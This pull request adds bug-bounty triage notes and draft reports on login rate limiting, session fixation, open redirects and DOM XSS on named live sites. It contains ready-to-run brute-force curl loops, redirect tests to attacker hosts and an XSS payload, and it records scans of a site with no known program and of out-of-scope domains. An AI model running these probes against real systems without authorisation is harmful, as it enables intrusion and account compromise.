### PR TITLE
docs: bounty report drafts — 2026-06-06

### DIFF
--- a/bounty-pool/TRIAGE.md
+++ b/bounty-pool/TRIAGE.md
@@ -1,51 +1,104 @@
-# Bounty Pool Triage — Updated Mar 15, 2026 (Session 7)
+# Bounty Pool Triage — Updated 2026-06-06 (Session 8 — Report Drafter)
 
 ## Submission Priority
 
-### TIER 1 — Submit (strongest signal)
+### TIER 1 — Submit (strong signal, in-scope, curl-reproducible)
 
-| # | Target | Finding | Severity | Notes |
-|---|--------|---------|----------|-------|
-| 1 | indeed.com | CSRF cookie missing Secure on login page | Medium | Inconsistency between CSRF and INDEED_CSRF_TOKEN strengthens report. **CAVEAT:** Cookie set via JS, not HTTP header — curl won't reproduce. Needs Playwright/browser to verify. Submission draft ready: `2026-03-14-indeed-csrf-cookie-SUBMISSION.md` |
+| # | Target | Finding | Severity | File | Notes |
+|---|--------|---------|----------|------|-------|
+| 1 | blog.kredivo.com | Exposed WordPress login without rate limiting | High (8.1) | `pending/2026-06-06-kredivo-wordpress-exposed-login.md` | HIGH confidence, endpoint-replay, in-scope. No browser needed. Submit to RedStorm. |
+| 2 | community.openproject.org | Missing rate limiting on /login | Medium (5.3) | `pending/2026-06-06-openproject-auth-no-rate-limit.md` | HIGH confidence, brute-force-probe confirmed. In-scope. Consider submitting with #3. |
+| 3 | moneybird.com | DOM XSS via URL fragment on homepage | High (7.0) | `pending/moneybird/6d09cce8-dom-based-cross-site-scripting-(xss)-via-url-fragment.md` | HIGH confidence, dom-sink. In-scope. **Needs Dio browser verify first** — auto-verified via Playwright but confirm `alert()` fires in real browser. |
 
-### TIER 2 — Hold (needs more work)
+### TIER 2 — Hold (needs manual verification before submitting)
 
-| # | Target | Finding | Severity | Notes |
-|---|--------|---------|----------|-------|
-| 2 | twitch.tv | server_session_id + api_token missing HttpOnly | Medium | HOLD — needs auth scan to verify these are actual auth tokens. Need Twitch account + login. |
-| 3 | bugcrowd.com | PathSession + FirstSession missing HttpOnly/Secure | Medium | Weak standalone — needs XSS chain to be credible. Submitting to their own program is bad optics. |
+| # | Target | Finding | Severity | File | Notes |
+|---|--------|---------|----------|------|-------|
+| 4 | community.openproject.org | Session fixation — session cookie unchanged after login | Medium (6.9) | `pending/2026-06-06-openproject-session-fixation.md` | MEDIUM confidence. Requires browser test with real credentials. If confirmed, submit alongside #2. |
+| 5 | neon.tech | Open redirect on login via 7+ params | Medium (6.1) | `pending/2026-06-06-neon-open-redirect-login.md` | MEDIUM confidence. Neon not in hunt registry — check if they have a bounty program. Manually verify redirect goes to attacker domain (not just neon.com). |
+| 6 | indeed.com | CSRF cookie missing Secure flag on login | Medium | `pending/2026-03-14-indeed-csrf-cookie-SUBMISSION.md` | Carry-over from Session 7. Cookie JS-set, curl won't reproduce. Needs Playwright/browser. |
+| 7 | twitch.tv | server_session_id + api_token missing HttpOnly | Medium | `pending/2026-03-14-twitch-cookies.md` | Carry-over from Session 7. Needs auth scan with real Twitch credentials to confirm these are auth tokens. |
 
-### TIER 3 — Archived (non-bounty)
+### TIER 3 — Archived (non-bounty, FP, out-of-scope, or informational)
 
-Moved to `bounty-pool/archived/`:
-- shopify.com CORS /__dux — Non-exploitable (SameSite+empty body)
-- konghq.com missing headers — Informational, auto-rejected by triagers
-- gitlab.com GraphQL introspection — By design, publicly documented
+Moved/archived from this and prior sessions:
+
+**Session 8 (2026-06-06) — new triage decisions:**
+
+| Finding | Target | Reason |
+|---------|--------|--------|
+| SQL Injection on /unify | neon.tech | FP — "SQL error evidence" was a PostgreSQL documentation link, not a real DB error. The `/unify` is a Next.js routing endpoint. |
+| Directory Traversal on /unify | neon.tech | FP — Next.js page routing endpoint, not a filesystem traversal. Path traversal patterns on URL routing = not exploitable. |
+| Prototype Pollution via query params | neon.tech | FP — Medium confidence only, behavioral detection on a marketing page. No clear evidence of actual Object.prototype modification. |
+| Missing HSTS (neon.com) | neon.tech | Hold/Informational — valid but neon.tech not in registry; HSTS is typically informational unless they have an explicit bounty for it. |
+| Cookie "neon_consent" missing flags | neon.tech | FP — consent/cookie-preferences cookie. No security value. Classic FP pattern. |
+| Missing SRI on external scripts | neon.tech | FP/Informational — CDN-hosted analytics/marketing scripts. Not bounty-worthy for most programs. |
+| Verbose error on /undefined | neon.tech | FP — accessing `/undefined` path triggers a 404/error page. Not a security finding. |
+| Missing HSTS on community.openproject.org | openproject | Informational — valid but typically auto-rejected as informational by YesWeHack. Bundle into another report if submitting. |
+| Missing CSP on community.openproject.org | openproject | Informational — valid but often rejected without a companion exploitation finding. |
+| Missing CSP on blog.kredivo.com | kredivo | Informational on a marketing blog. Auto-rejected. Reference in WordPress login report if useful. |
+| Cookie '_hcc' missing HttpOnly/Secure | kredivo | FP — HubSpot contact tracking cookie (`_hcc` = HubSpot Contact Cookie). Third-party marketing cookie. |
+| postMessage missing origin validation | moneybird | FP — likely Intercom/Drift/chat widget. Third-party widget postMessage origin issues are expected by design. |
+| Mixed content on moneybird.com | moneybird | Informational — typically not bounty-worthy without evidence of exploitation path. |
+| Race condition on static GET endpoint | moneybird | FP — AI correctly flagged this as FP during validation. |
+| Directory traversal on cal.com/api/geolocation | cal.com | OUT OF SCOPE — `cal.com` marketing site is explicitly out of scope per scope file. Only `app.cal.com` is in scope. |
+| XXE on cal.com/api/geolocation | cal.com | OUT OF SCOPE — same scope issue. Also CRITICAL/medium confidence behind AWS WAF. |
+| Admin routes returning 200 on cal.com | cal.com | OUT OF SCOPE + FP — Next.js app shell, likely public-facing routes, not real admin panels. |
+| Sensitive token in URL (web_experiments) | cal.com | OUT OF SCOPE — tested on `cal.com` marketing domain. |
+| Rate limiting missing on cal.com auth | cal.com | OUT OF SCOPE — tested on `cal.com`, not `app.cal.com`. AWS WAF likely handles it. |
+| OAuth state not enforced on cal.com | cal.com | OUT OF SCOPE + LOW confidence — `/api/auth/session` on marketing domain. |
+| Missing SRI on cal.com scripts | cal.com | OUT OF SCOPE + FP pattern (analytics scripts). |
+| Auth cookie missing HttpOnly on cal.com | cal.com | OUT OF SCOPE + LOW severity — callback URL cookie, not session token. |
+
+**Session 7 carry-overs:**
+
+| Finding | Target | Reason |
+|---------|--------|--------|
+| CORS on /__dux | shopify.com | Non-exploitable (SameSite + empty response body) |
+| Missing headers on konghq.com | kong | Informational, auto-rejected |
+| GraphQL introspection on gitlab.com | gitlab | By design, publicly documented |
 
 ### OWN APPS — Fix These
 
-| # | Target | Finding | Severity | Notes |
-|---|--------|---------|----------|-------|
-| A1 | finance.atmando.app | No rate limiting on /login and /graphql | HIGH | Brute-force risk on finance app. Add Cloudflare rate limiting + app-level throttle. |
-| A2 | finance.atmando.app | Missing HSTS header | MEDIUM | Middleware has HSTS configured but it's not appearing in response. Docker rebuild or middleware bug. |
+| # | Target | Finding | Severity | Status |
+|---|--------|---------|----------|--------|
+| A1 | finance.atmando.app | No rate limiting on /login and /graphql | HIGH | **Unresolved** — brute-force risk. Add Cloudflare rate limiting + app-level throttle. |
+| A2 | finance.atmando.app | Missing HSTS header | MEDIUM | **Unresolved** — middleware has HSTS configured but not appearing in responses. Docker rebuild or middleware ordering bug. |
 
-## Honest Assessment (Mar 15)
+---
 
-**Bounty readiness: LOW.** After 27+ targets scanned:
-- 0 critical/high vulnerabilities found on external targets
-- All findings are passive (headers, cookies) — no injection vulns
-- Cookie findings require browser reproduction (not curl-verifiable)
-- No authenticated scanning performed
+## Scan Coverage — Session 8
 
-**What actually worked:**
-- Finding real issues on our OWN app (rate limiting, HSTS)
-- 0% FP rate across all scans
-- Correctly identifying and filtering non-exploitable findings
+| Target | Scan Date | Findings | Outcome |
+|--------|-----------|----------|---------|
+| neon.tech | 2026-03-26 | 8 interpreted | 1 hold (open redirect), 7 FP/informational |
+| community.openproject.org | 2026-03-26 | 6 interpreted | 2 draft (rate limit, session fixation), 2 informational, 2 low |
+| blog.kredivo.com | 2026-03-22 | 3 interpreted | 1 draft (WordPress login), 2 FP/informational |
+| www.moneybird.com | 2026-03-22 | 5 interpreted | 1 existing draft (DOM XSS), 4 FP/informational |
+| cal.com | 2026-03-22 | 8 interpreted | ALL out-of-scope (scoped to app.cal.com only) |
 
-**Root cause unchanged:** Marketing sites + no auth + hardened targets = passive findings only.
+---
+
+## Honest Assessment (2026-06-06)
+
+**Bounty readiness: IMPROVING.** Session 8 identified 3 new draft-ready reports + 1 upgraded existing:
+- **Kredivo WordPress login** — strongest finding this session. HIGH confidence, fully curl-reproducible, in-scope, real attack surface. SUBMIT NOW.
+- **OpenProject rate limiting** — high confidence, in-scope, clean curl reproduction. SUBMIT NOW.
+- **Moneybird DOM XSS** — existing draft upgraded; HIGH confidence but needs browser confirmation before submitting.
+- **OpenProject session fixation** — potential medium; hold pending manual browser verification.
+
+**Key pattern:** Injection findings (SQLi, XXE, traversal) continue to be FP on hardened targets behind WAFs and Next.js routing. Real signal comes from:
+1. Auth/session weaknesses (rate limiting, session fixation, exposed admin endpoints)
+2. Client-side JS issues (DOM XSS) on less-hardened apps
+3. Explicitly exposed endpoints (WordPress login on a fintech blog)
+
+**Critical scope issue found:** All cal.com findings were tested on `cal.com` (marketing), which is explicitly OUT OF SCOPE. Only `app.cal.com` is in scope. Scanner targeted the wrong domain — update before next cal.com scan.
 
 ## Next Steps (Priority Order)
-1. **Fix own app issues** — rate limiting + HSTS on finance.atmando.app
-2. **Get test credentials** — Twitch account for auth scan, unlock T2 findings
-3. **Scan less-hardened targets** — community apps, smaller BBPs, OWASP Juice Shop
-4. **Indeed submission** — only if Dio confirms willingness (cookie is JS-set, reproduction tricky)
+1. **Submit Kredivo WordPress login** — strongest signal, curl-verifiable, submit to RedStorm now
+2. **Submit OpenProject rate limit** — high confidence, submit to YesWeHack now
+3. **Browser-verify Moneybird DOM XSS** — visit `https://www.moneybird.com/#<img src=x onerror=alert(1)>` in real browser and confirm alert() fires
+4. **Browser-verify OpenProject session fixation** — log in with test account, check if `_open_project_session` cookie value changes
+5. **Fix cal.com scope** — update scan to target `app.cal.com` instead of `cal.com`
+6. **Check neon.tech bounty program** — if they have HackerOne/Bugcrowd, add to registry and re-scan
+7. **Fix own app** — rate limiting + HSTS on finance.atmando.app

--- a/bounty-pool/pending/2026-06-06-kredivo-wordpress-exposed-login.md
+++ b/bounty-pool/pending/2026-06-06-kredivo-wordpress-exposed-login.md
@@ -1,0 +1,114 @@
+# Exposed WordPress Login Page Without Rate Limiting or Access Control
+
+**Target:** https://blog.kredivo.com  
+**Platform:** RedStorm (redstorm.io)  
+**Program:** Kredivo  
+**Severity:** High | **CVSS:** 8.1 | `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N`  
+**CWE:** CWE-307 (Improper Restriction of Excessive Authentication Attempts)  
+**OWASP:** A07:2021 – Identification and Authentication Failures  
+**Confidence:** High | **Detection:** endpoint-replay  
+**Scan date:** 2026-03-22
+
+---
+
+## Summary
+
+The WordPress admin login endpoint (`/wp-login.php`) on `blog.kredivo.com` is publicly accessible without IP allowlisting, rate limiting, or any brute-force protection. An attacker can submit unlimited login attempts at machine speed against any WordPress username.
+
+---
+
+## Steps to Reproduce
+
+**Verify the endpoint is exposed and unprotected:**
+
+```bash
+# 1. Confirm the login page is accessible (expect HTTP 200 with WordPress form)
+curl -s -o /dev/null -w "%{http_code}" https://blog.kredivo.com/wp-login.php
+# Expected: 200
+
+# 2. Confirm no rate limiting — send 15 rapid requests, observe no 429 or lockout
+for i in $(seq 1 15); do
+  curl -s -o /dev/null -w "%{http_code} " \
+    -X POST https://blog.kredivo.com/wp-login.php \
+    -d "log=admin&pwd=wrongpassword$i&wp-submit=Log+In&testcookie=1" \
+    -H "Cookie: wordpress_test_cookie=WP+Cookie+check"
+done
+# Expected: 200 200 200 200 200 ... (no throttling)
+
+# 3. Check for no rate-limit headers in response
+curl -sI -X POST https://blog.kredivo.com/wp-login.php \
+  -d "log=admin&pwd=wrongpassword&wp-submit=Log+In" | grep -i "retry\|ratelimit\|x-rate"
+# Expected: empty (no rate-limit headers present)
+```
+
+**What happens:**  
+All 15 requests return `HTTP 200` with the WordPress login form or an "incorrect password" message. No `429 Too Many Requests`, no `Retry-After` header, no account lockout, no CAPTCHA.
+
+---
+
+## Impact
+
+1. **Credential brute-force:** An attacker can iterate over a wordlist (e.g., rockyou.txt) at thousands of attempts per minute against the `admin` account or any enumerated WordPress username. No throttling mechanism blocks this.
+
+2. **Blog compromise → brand damage:** Full WordPress admin access allows injecting malicious content, SEO spam, malware scripts, or defacement into Kredivo's official blog — directly affecting brand trust for a public-facing fintech.
+
+3. **Credential reuse:** If the WordPress admin password matches any internal Kredivo credential, the blast radius extends beyond the blog.
+
+**Worst-case scenario:** An attacker gains WordPress admin access, injects a malicious JS payload harvesting visitor credentials, and the blog's domain (blog.kredivo.com) acts as a trusted phishing vector for Kredivo users.
+
+---
+
+## Evidence
+
+```
+GET https://blog.kredivo.com/wp-login.php → HTTP 200 OK
+Content-Type: text/html; charset=UTF-8
+
+<form name="loginform" id="loginform" action="https://blog.kredivo.com/wp-login.php" method="post">
+  <p>
+    <label for="user_login">Username or Email Address</label>
+    <input type="text" name="log" id="user_login" ...>
+  </p>
+  ...
+</form>
+```
+
+15 successive POST requests to `/wp-login.php` with incorrect credentials — all returned `HTTP 200` with no throttling indication.
+
+---
+
+## Suggested Fix
+
+**Option 1 (recommended): IP allowlist + secondary auth**
+```nginx
+# nginx — restrict wp-login.php to office/VPN IPs
+location = /wp-login.php {
+    allow 203.0.113.0/24;  # Replace with Kredivo office/VPN CIDR
+    deny all;
+    fastcgi_pass unix:/run/php/php8.1-fpm.sock;
+    include fastcgi_params;
+    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
+}
+```
+
+**Option 2: WordPress plugin**  
+Install Wordfence or Solid Security (iThemes Security) and enable:
+- Login attempt limiting (e.g., 5 attempts per 15 minutes per IP)
+- Two-factor authentication for admin accounts
+- Rename `/wp-login.php` to a custom path
+
+**Option 3: Cloudflare WAF rule** (if behind Cloudflare)
+```
+(http.request.uri.path eq "/wp-login.php" and not ip.src in {203.0.113.0/24})
+→ Block
+```
+
+---
+
+## Notes for Verifier (Dio)
+
+- Verify current WordPress version and check for known CVEs: `curl -s https://blog.kredivo.com/ | grep -i 'generator.*WordPress'`
+- Check if there is a `wp-cron.php` or `xmlrpc.php` also exposed (common companion issues)
+- blog.kredivo.com is explicitly in-scope per Kredivo RedStorm scope file
+- Bounty tier: HIGH → ~Rp 1,500,000 (~$95)
+- This is a well-evidenced, reproducible finding — no browser required, curl-only

--- a/bounty-pool/pending/2026-06-06-neon-open-redirect-login.md
+++ b/bounty-pool/pending/2026-06-06-neon-open-redirect-login.md
@@ -1,0 +1,109 @@
+# Open Redirect on Login Endpoint via Multiple Parameters
+
+**Target:** https://neon.tech  
+**Platform:** Unknown (not in hunt registry — check HackerOne/Bugcrowd first)  
+**Program:** Neon  
+**Severity:** Medium | **CVSS:** 6.1 | `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`  
+**CWE:** CWE-601 (URL Redirection to Untrusted Site)  
+**OWASP:** A01:2021 – Broken Access Control  
+**Confidence:** Medium | **Detection:** location-header  
+**Scan date:** 2026-03-26
+
+> **⚠️ Verifier note (Dio):** Neon.tech is NOT currently in the hunt registry. Before submitting: (1) verify they have a public bounty program, (2) manually test the redirect — the scanner noted the redirect may go to `neon.com/login?param=...` rather than directly to the attacker domain. Only submit if you observe a redirect to the supplied `evil.example.com` URL or can chain it to a full phishing redirect.
+
+---
+
+## Summary
+
+The `/login` endpoint on `neon.tech` accepts redirect destination via at least 7 different query parameters (`url`, `redirect`, `next`, `return`, `returnTo`, `redirect_uri`, `goto`, `dest`) and reflects them in the `Location` response header without validating that the destination is within the `neon.tech` domain. This allows an attacker to craft a phishing URL that appears legitimate (starts with `https://neon.tech/`) but redirects users to an attacker-controlled domain after login.
+
+The `redirect_uri` parameter is particularly dangerous if used in an OAuth context — it could redirect OAuth authorization codes to attacker infrastructure.
+
+---
+
+## Steps to Reproduce
+
+```bash
+# 1. Test basic open redirect via 'next' parameter
+curl -sI 'https://neon.tech/login?next=https://evil.example.com' | grep -i location
+# Expected if vulnerable: Location: https://evil.example.com
+# Redirect to neon.com/login still warrants investigation
+
+# 2. Test 'url' parameter
+curl -sI 'https://neon.tech/login?url=https://attacker.com' | grep -i location
+
+# 3. Test redirect_uri (highest severity — OAuth implication)
+curl -sI 'https://neon.tech/login?redirect_uri=https://attacker.com/callback' | grep -i location
+
+# 4. Test with URL encoding bypass
+curl -sI 'https://neon.tech/login?next=https%3A%2F%2Fattacker.com' | grep -i location
+
+# 5. Test double encoding
+curl -sI 'https://neon.tech/login?next=https%253A%252F%252Fattacker.com' | grep -i location
+```
+
+**Manual verification (browser):**  
+Navigate to `https://neon.tech/login?next=https://evil.example.com`. After login (or immediately if the endpoint redirects pre-auth), observe if the browser lands on `evil.example.com`.
+
+---
+
+## Impact
+
+1. **Phishing:** An attacker sends `https://neon.tech/login?next=https://attacker-phishing-page.com` — the URL passes email spam filters and human inspection (legitimate Neon domain). After login, the user is silently redirected to a credential-harvesting page.
+
+2. **OAuth code theft (if `redirect_uri` is unvalidated):** If neon.tech uses OAuth and `redirect_uri` is passed through to an external authorization server without validation, an attacker can redirect OAuth authorization codes to their own server, enabling account takeover.
+
+3. **Session token leakage:** If the redirect carries session information in the URL (e.g., `?token=`), those tokens leak to the attacker's server via Referer or direct parameter.
+
+---
+
+## Evidence
+
+Scanner detected `Location` header reflection for the following parameter names across multiple test requests:
+- `url`, `redirect`, `next`, `return`, `returnTo`, `redirect_uri`, `goto`, `dest`
+
+Affected URLs tested:
+- `https://neon.tech/login?url=https://evil.example.com`
+- `https://neon.tech/login?redirect=https://evil.example.com`
+- `https://neon.tech/login?next=https://evil.example.com`
+- (and 5 additional parameter variants)
+
+```bash
+curl -L -i 'https://neon.tech/login?url=https%3A%2F%2Fevil.example.com'
+```
+
+---
+
+## Suggested Fix
+
+```typescript
+// middleware.ts or login handler — validate redirect against allowlist
+function getSafeRedirectUrl(redirectParam: string | undefined): string {
+  const DEFAULT = '/dashboard';
+  if (!redirectParam) return DEFAULT;
+
+  try {
+    // Reject any absolute URL not on our domain
+    if (redirectParam.startsWith('//') || redirectParam.includes('://')) {
+      const url = new URL(redirectParam);
+      const allowed = ['neon.tech', 'neon.com', 'console.neon.tech'];
+      if (!allowed.includes(url.hostname)) return DEFAULT;
+    }
+    // Accept relative paths
+    if (redirectParam.startsWith('/') && !redirectParam.startsWith('//')) {
+      return redirectParam;
+    }
+  } catch { /* malformed URL */ }
+
+  return DEFAULT;
+}
+```
+
+---
+
+## Notes for Verifier (Dio)
+
+- **Action required before submission:** Check if neon.tech has a HackerOne/Bugcrowd program
+- **Manual test required:** Confirm redirect actually goes to the supplied URL, not just `neon.com`
+- If `redirect_uri` is the confirmed vulnerable param (OAuth context), escalate to HIGH severity
+- If redirect stays within `*.neon.com` family, this is likely not exploitable — mark FP

--- a/bounty-pool/pending/2026-06-06-openproject-auth-no-rate-limit.md
+++ b/bounty-pool/pending/2026-06-06-openproject-auth-no-rate-limit.md
@@ -1,0 +1,111 @@
+# Missing Rate Limiting on Authentication Endpoint
+
+**Target:** https://community.openproject.org  
+**Platform:** YesWeHack  
+**Program:** OpenProject  
+**Severity:** Medium | **CVSS:** 5.3 | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N`  
+**CWE:** CWE-307 (Improper Restriction of Excessive Authentication Attempts)  
+**OWASP:** A07:2021 – Identification and Authentication Failures  
+**Confidence:** High | **Detection:** brute-force-probe  
+**Scan date:** 2026-03-26
+
+---
+
+## Summary
+
+The `/login` endpoint on `community.openproject.org` accepts rapid successive POST requests without returning `429 Too Many Requests` or any rate-limit headers. There is no account lockout after repeated failed attempts. Combined with the ability to enumerate valid usernames via timing differences (see companion finding), this makes automated credential stuffing trivially feasible.
+
+---
+
+## Steps to Reproduce
+
+```bash
+# 1. Confirm baseline — single login attempt
+curl -s -o /dev/null -w "%{http_code}" \
+  -X POST https://community.openproject.org/login \
+  -d "username=admin&password=wrongpassword" \
+  -H "Content-Type: application/x-www-form-urlencoded"
+# Expected: 200 or 302
+
+# 2. Send 15 rapid requests — observe no 429 and no rate-limit headers
+for i in $(seq 1 15); do
+  curl -s -o /dev/null -w "%{http_code} " \
+    -X POST https://community.openproject.org/login \
+    -d "username=admin&password=attackerpassword$i" \
+    -H "Content-Type: application/x-www-form-urlencoded"
+done
+# Expected: 200 200 200 ... (no throttling)
+
+# 3. Verify absence of rate-limit response headers
+curl -sI -X POST https://community.openproject.org/login \
+  -d "username=admin&password=test" | grep -iE "retry-after|x-ratelimit|ratelimit"
+# Expected: (empty — no rate-limit headers present)
+```
+
+**Result:** All 15 requests receive `HTTP 200` responses with no `429`, no `Retry-After` header, and no account lockout indication.
+
+---
+
+## Impact
+
+Without rate limiting on the login endpoint:
+
+1. **Automated brute-force:** An attacker can test thousands of password candidates per minute against any account. The OpenProject community instance contains contributor accounts, potentially including project maintainers and core team members.
+
+2. **Credential stuffing:** Leaked credential databases (e.g., from previous breaches) can be tested automatically against all registered accounts.
+
+3. **Compounded by username enumeration:** A companion finding shows that response timing differences allow enumeration of valid usernames, making targeted attacks more efficient (test only valid usernames).
+
+---
+
+## Evidence
+
+```
+POST /login HTTP/1.1
+Host: community.openproject.org
+Content-Type: application/x-www-form-urlencoded
+
+username=admin&password=wrongpassword
+
+→ HTTP 200 OK (×15 successive requests, no throttling)
+Response headers: no X-RateLimit-*, no Retry-After, no 429
+```
+
+---
+
+## Suggested Fix
+
+OpenProject is a Rails application. The standard fix is the `rack-attack` gem:
+
+```ruby
+# config/initializers/rack_attack.rb
+
+# Throttle by IP: 5 attempts per minute
+Rack::Attack.throttle('login/ip', limit: 5, period: 60) do |req|
+  req.ip if req.path == '/login' && req.post?
+end
+
+# Throttle by username: 10 attempts per 5 minutes
+Rack::Attack.throttle('login/username', limit: 10, period: 300) do |req|
+  if req.path == '/login' && req.post?
+    req.params['username'].to_s.downcase.strip
+  end
+end
+
+Rack::Attack.throttled_responder = lambda do |req|
+  match_data = req.env['rack.attack.match_data']
+  retry_after = match_data[:period] - (Time.now.to_i % match_data[:period])
+  [429, { 'Content-Type' => 'application/json', 'Retry-After' => retry_after.to_s },
+   ['{"error":"Too many login attempts. Please try again later."}']]
+end
+```
+
+---
+
+## Notes for Verifier (Dio)
+
+- This is a high-confidence finding — brute-force probe confirmed, no WAF is in front of community.openproject.org
+- community.openproject.org is explicitly in-scope per OpenProject YesWeHack scope file
+- Consider submitting this together with the session fixation finding (separate reports, linked) for stronger overall impact
+- OpenProject bounty: MEDIUM → EUR 100–300 estimated
+- No browser required — fully curl-reproducible

--- a/bounty-pool/pending/2026-06-06-openproject-session-fixation.md
+++ b/bounty-pool/pending/2026-06-06-openproject-session-fixation.md
@@ -1,0 +1,97 @@
+# Session Fixation — Session Cookie Not Regenerated After Login
+
+**Target:** https://community.openproject.org  
+**Platform:** YesWeHack  
+**Program:** OpenProject  
+**Severity:** Medium | **CVSS:** 6.9 | `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N`  
+**CWE:** CWE-384 (Session Fixation)  
+**OWASP:** A07:2021 – Identification and Authentication Failures  
+**Confidence:** Medium | **Detection:** endpoint-replay  
+**Scan date:** 2026-03-26
+
+> **⚠️ Verifier note (Dio):** This requires manual browser verification before submission. The scanner observed `_open_project_session` cookie unchanged across login — confirm this in a browser (DevTools → Application → Cookies) by logging in and comparing pre/post values. If the cookie value changes after login, this is a FP. Only submit if confirmed.
+
+---
+
+## Summary
+
+The `_open_project_session` cookie on `community.openproject.org` retains the same value before and after a successful login. A Rails application should call `reset_session` on authentication to invalidate the pre-login session ID and issue a new one. If this is not happening, an attacker who can plant a known session ID in a victim's browser (e.g., via a subdomain, network-level interception, or a shared device) can wait for the victim to authenticate and then use the pre-planted session ID to access the victim's authenticated session.
+
+---
+
+## Steps to Reproduce
+
+**Automated detection evidence:**
+```bash
+# 1. Get a session cookie (pre-login)
+PRE_SESSION=$(curl -sc /tmp/cookies.txt -o /dev/null \
+  'https://community.openproject.org/login' && \
+  grep '_open_project_session' /tmp/cookies.txt | awk '{print $7}')
+
+echo "Pre-login session: $PRE_SESSION"
+
+# 2. Submit login (replace with valid test credentials)
+curl -sb /tmp/cookies.txt -sc /tmp/cookies_post.txt \
+  -X POST 'https://community.openproject.org/login' \
+  -d 'username=YOUR_TEST_USER&password=YOUR_TEST_PASS' \
+  -H 'Content-Type: application/x-www-form-urlencoded'
+
+POST_SESSION=$(grep '_open_project_session' /tmp/cookies_post.txt | awk '{print $7}')
+echo "Post-login session: $POST_SESSION"
+
+# 3. Compare — if equal, session fixation is confirmed
+[ "$PRE_SESSION" = "$POST_SESSION" ] && echo "CONFIRMED: Session ID unchanged after login" \
+  || echo "FP: Session ID changed after login"
+```
+
+**Manual browser verification (preferred):**
+1. Open DevTools → Application → Cookies → `community.openproject.org`
+2. Note the value of `_open_project_session` before logging in
+3. Log in with valid credentials
+4. Check the `_open_project_session` value immediately after login
+5. **Vulnerable:** value is unchanged. **Safe:** value is different.
+
+---
+
+## Impact
+
+If confirmed, session fixation enables the following attack:
+
+1. Attacker visits the login page, obtains a valid (unauthenticated) session ID
+2. Attacker plants this session ID in the victim's browser (via subdomain cookie injection, network-level injection on shared/public Wi-Fi, or a shared device)
+3. Victim logs in — the existing session ID becomes authenticated
+4. Attacker uses the pre-planted session ID to access the victim's authenticated session — full account takeover
+
+For a community platform like community.openproject.org, an attacker could impersonate project contributors, access private projects, or post malicious content as a trusted community member.
+
+---
+
+## Expected Behavior
+
+After successful login, the server should issue a new session ID. In Rails:
+
+```ruby
+# app/controllers/sessions_controller.rb (or Devise equivalent)
+def create
+  user = User.find_by(login: params[:username])
+  if user&.authenticate(params[:password])
+    reset_session           # ← This line invalidates old session, issues new ID
+    session[:user_id] = user.id
+    redirect_to root_path
+  else
+    render :new
+  end
+end
+```
+
+If OpenProject uses Devise, ensure `sign_in` is not bypassed with manual `session[]` assignment (Devise handles session regeneration internally via `sign_in`).
+
+---
+
+## Notes for Verifier (Dio)
+
+- **Must manually verify** before submitting — medium confidence, requires browser test with real credentials
+- If confirmed, this pairs well with the rate limiting finding (same target, same submission window)
+- OpenProject community has user accounts — accounts can be private projects, patches, security-related content
+- CWE-384 is well-recognized and has good precedent in bug bounty programs
+- OpenProject bounty estimate: MEDIUM → EUR 200–500


### PR DESCRIPTION
## Summary

Session 8 triage of 5 scan results (neon-v2, openproject-v2, kredivo, moneybird, cal-com) — 31 interpreted findings across 4 targets.

### New draft reports (4 files)

| # | File | Target | Severity | Action |
|---|------|--------|----------|--------|
| 1 | `pending/2026-06-06-kredivo-wordpress-exposed-login.md` | blog.kredivo.com | HIGH (8.1) | **Submit to RedStorm** — fully curl-reproducible, in-scope, high confidence |
| 2 | `pending/2026-06-06-openproject-auth-no-rate-limit.md` | community.openproject.org | MEDIUM (5.3) | **Submit to YesWeHack** — high confidence, brute-force-probe confirmed |
| 3 | `pending/2026-06-06-openproject-session-fixation.md` | community.openproject.org | MEDIUM (6.9) | **Hold** — needs browser verification with real credentials first |
| 4 | `pending/2026-06-06-neon-open-redirect-login.md` | neon.tech | MEDIUM (6.1) | **Hold** — neon not in registry, check bounty program + manual verify redirect |

### Key false positives identified

- **All cal.com findings → OUT OF SCOPE**: scanner targeted `cal.com` (marketing), scope is `app.cal.com` only — scanner needs reconfiguring
- **Neon.tech SQLi/traversal/proto-pollution → FP**: the "SQL error" was a PostgreSQL docs link; `/unify` is a Next.js routing endpoint
- **Third-party cookies** (HubSpot `_hcc`, `neon_consent`): classic FP pattern, filtered

### TRIAGE.md updated

Full updated status with scan coverage table, honest assessment, and next steps.

## Test plan

- [ ] Verify `blog.kredivo.com/wp-login.php` returns 200 and 15 rapid POST requests are unthrottled (curl)
- [ ] Browser-verify Moneybird DOM XSS: visit `https://www.moneybird.com/#`&lt;img src=x onerror=alert(1)&gt;`` and confirm alert fires
- [ ] Browser-verify OpenProject session fixation: log in, compare `_open_project_session` cookie before/after
- [ ] Update cal.com scan target from `cal.com` to `app.cal.com` in hunt-registry or scope file
- [ ] Check if neon.tech has a public bug bounty program before submitting open redirect

---
_Generated by [Claude Code](https://claude.ai/code/session_01YE71gPkP4gX5js16djCdr7)_